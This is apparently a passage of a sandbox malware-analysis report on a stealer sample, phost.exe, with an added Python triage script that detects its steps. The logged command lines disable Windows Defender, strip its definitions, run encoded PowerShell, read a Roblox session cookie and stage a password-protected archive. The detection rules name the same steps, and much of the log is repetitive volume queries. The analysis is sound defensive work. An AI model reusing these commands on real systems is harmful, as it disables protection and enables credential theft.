aaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
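Analyst note, added to this report rather than generated by Joe Sandbox: taken together, the process-creation lines above are the usable detection surface for this sample: Set-MpPreference with Disable* switches plus MpCmdRun -RemoveDefinitions -All (Defender tampering), powershell.exe -EncodedCommand spawning csc.exe and cvtres.exe (Add-Type compiling C# at run time), attrib -r and +r bracketing drivers\etc\hosts (the hosts-file rewrite), rar.exe a -hp<password> building the archive that gets uploaded, registry reads of .ROBLOSECURITY, and the wmic, getmac and registry queries that profile the host. The Python below is an added example, not Joe Sandbox's scoring logic and not the Sigma rules the report cites; its rule names are its own. SAMPLE_LINES are copied from the report above, with the encoded blob cut to its first characters and one line kept in the fused "exeProcess created" rendering the viewer produces, so the parser is shown accepting both forms.

```python
"""Triage process-creation lines from a sandbox report for the Defender
tampering, staging and profiling steps this sample performs.

Added analyst example: not Joe Sandbox's scoring logic and not the Sigma rules
the report cites. Rule names are this example's own. SAMPLE_LINES are copied
from the report above, with the -EncodedCommand blob cut to its first
characters; the third line keeps the fused "cmd.exeProcess created" spelling
the report viewer emits, so the parser is shown accepting both forms.
"""
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Tuple

SAMPLE_LINES = [
    r'Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"',
    r"Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend",
    r"Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqak",
    r'Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jnxiphgt\jnxiphgt.cmdline"',
    r"Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts",
    r'Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\C7XW6.zip" *',
    r"Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY",
    r"Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid",
    r"Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER",
    r"Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F",
]

# Parent image, child image, then the rest of the line as the command line. The
# lazy parent group stops at "Process created:" whether or not a space precedes it.
_LINE_RE = re.compile(r"Source:\s*(?P<parent>\S+?)\s*Process created:\s*(?P<child>\S+)\s*(?P<cmdline>.*)")
# -EncodedCommand or one of its accepted short forms (-e, -ec, -enc) plus base64.
_ENC_RE = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+[a-z0-9+/=]{16,}")


@dataclass
class Finding:
    rule: str
    parent: str
    child: str
    cmdline: str


def parse_line(line: str) -> Optional[Tuple[str, str, str]]:
    """Return (parent image, child image, command line), or None for other lines."""
    m = _LINE_RE.search(line)
    return (m.group("parent"), m.group("child"), m.group("cmdline")) if m else None


def _has(text: str, *needles: str) -> bool:
    return any(n in text for n in needles)


# Every rule receives the lower-cased (parent, child, cmdline) of one line.
RULES: Dict[str, Callable[[str, str, str], bool]] = {
    # Set-MpPreference with switches that turn Defender features or telemetry off.
    "defender_protection_disabled": lambda p, c, cmd: "set-mppreference" in cmd and _has(
        cmd, "-disablerealtimemonitoring", "-disableioavprotection", "-disablescriptscanning",
        "-disableintrusionpreventionsystem", "-mapsreporting disabled", "-submitsamplesconsent neversend"),
    # MpCmdRun -RemoveDefinitions -All strips the signature set.
    "defender_definitions_removed": lambda p, c, cmd: "mpcmdrun.exe" in cmd and "-removedefinitions" in cmd,
    # Encoded PowerShell: base64 script hidden from command-line inspection.
    "encoded_powershell": lambda p, c, cmd: "powershell" in c and _ENC_RE.search(cmd) is not None,
    # powershell.exe spawning csc.exe is Add-Type compiling C# at run time.
    "runtime_csharp_compile": lambda p, c, cmd: p.endswith("powershell.exe") and c.endswith("csc.exe"),
    # attrib -r / +r on the hosts file brackets a hosts-file rewrite.
    "hosts_file_attribute_change": lambda p, c, cmd: c.endswith("attrib.exe") and r"\drivers\etc\hosts" in cmd,
    # rar a ... -hp<pw>: archive with encrypted data and headers, staged for upload.
    "password_protected_archive": lambda p, c, cmd: c.endswith("rar.exe") and " a " in cmd and "-hp" in cmd,
    # Roblox session cookie read out of the registry.
    "roblox_cookie_registry_read": lambda p, c, cmd: ".roblosecurity" in cmd,
    # Hardware and licence identifiers gathered for the victim profile.
    "host_fingerprinting": lambda p, c, cmd: _has(cmd, "csproduct get uuid", "getmac", "totalphysicalmemory",
                                                 "win32_videocontroller", "processor_identifier", "backupproductkeydefault"),
}


def triage(lines: List[str]) -> List[Finding]:
    """Run every rule over every parseable line; one Finding per (line, rule) hit."""
    findings: List[Finding] = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        parent, child, cmdline = parsed
        lowered = (parent.lower(), child.lower(), cmdline.lower())
        findings.extend(Finding(name, parent, child, cmdline)
                        for name, rule in RULES.items() if rule(*lowered))
    return findings


def summarize(findings: List[Finding]) -> Dict[str, int]:
    """Hit count per rule, for a quick read of which stages the log covers."""
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f.rule] = counts.get(f.rule, 0) + 1
    return counts


if __name__ == "__main__":
    for f in triage(SAMPLE_LINES):
        image = f.child.rsplit("\\", 1)[-1]
        print(f"{f.rule:30} {image}")
    print(summarize(triage(SAMPLE_LINES)))
```

The tree /A /F line deliberately produces no finding: on its own it is ordinary directory enumeration, and it is the combination with the rar -hp staging and the Defender changes that makes this run actionable. The line parser is the only report-specific part; the rules operate on parent image, child image and command line, which is the same triple a Sysmon or Security-log process-creation event carries.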
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe Code function: 105_2_00007FF6BBCFB340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,105_2_00007FF6BBCFB340
              Source: C:\Users\user\Desktop\phost.exe Code function: 0_2_00007FF62CC995E0 cpuid 0_2_00007FF62CC995E0
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\Desktop\phost.exe VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\Desktop\phost.exe VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\_ctypes.pyd VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\Desktop\phost.exe VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\Desktop\phost.exe VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\Desktop\phost.exe VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\Desktop\phost.exe VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\Desktop\phost.exe VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\Desktop\phost.exe VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\Desktop\phost.exe VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\Desktop\phost.exe VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\Desktop\phost.exe VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\Desktop\phost.exe VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\Desktop\phost.exe VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\Desktop\phost.exe VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\Desktop\phost.exe VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\blank.aes VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\blank.aes VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\blank.aes VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\blank.aes VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\blank.aes VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\blank.aes VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\Desktop\phost.exe VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\_lzma.pyd VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\Desktop\phost.exe VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\Desktop\phost.exe VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\Desktop\phost.exe VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\Desktop\phost.exe VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\Desktop\phost.exe VolumeInformation
              Source: C:\Users\user\Desktop\phost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformation
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\_hashlib.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\_bz2.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\_sqlite3.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\_socket.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\select.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
